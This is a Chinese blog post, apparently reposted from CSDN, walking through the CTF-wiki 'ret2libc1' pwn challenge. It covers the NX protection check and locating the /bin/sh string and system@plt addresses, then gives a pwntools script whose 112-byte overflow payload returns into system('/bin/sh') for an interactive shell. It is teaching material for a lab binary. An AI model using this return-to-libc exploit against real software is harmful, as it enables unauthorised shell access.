当前位置:网站首页>跟着CTF-wiki学pwn——ret2libc1

跟着CTF-wiki学pwn——ret2libc1

2022-07-05 23:35:00 大瑞大

ret2libc

原理

执行libc中的/bin/sh

步骤

首先,检查程序的安全保护
在这里插入图片描述

开启NX:no executable 
(不可执行内存数据页)
(不能利用ret2text与ret2shellcode)

其次,查看有无/bin/sh

查看有无system (segment是plt,不是extern

在这里插入图片描述

/bin/sh,是一个字符串,需要知道地址。

system, 是一个可调用函数,需要知道地址。

用 system 调用 /bin/sh即可

所以编写payload,寻址方式可以查看之前的博客,同为112。

#!/usr/bin/env python
from pwn import *

sh = process('./ret2libc1')

binsh_addr = 0x8048720
system_plt = 0x08048460
payload = flat(['a' * 112, system_plt, 'b' * 4, binsh_addr])
sh.sendline(payload)

sh.interactive()

调用libc函数的格式:

system_plt + 4个字节(32位地址) + /bin/sh字符串

这里我们需要注意函数调用栈的结构,如果是正常调用 system 函数,我们调用的时候会有一个对应的返回地址,这里以’bbbb’ 作为虚假的地址,其后参数对应的参数内容。

这个例子相对来说简单,同时提供了 system 地址与 /bin/sh 的地址,但是大多数程序并不会有这么好的情况。

原网站

版权声明
本文为[大瑞大]所创,转载请带上原文链接,感谢
https://blog.csdn.net/qq_42882717/article/details/125616935

边栏推荐

猜你喜欢

随机推荐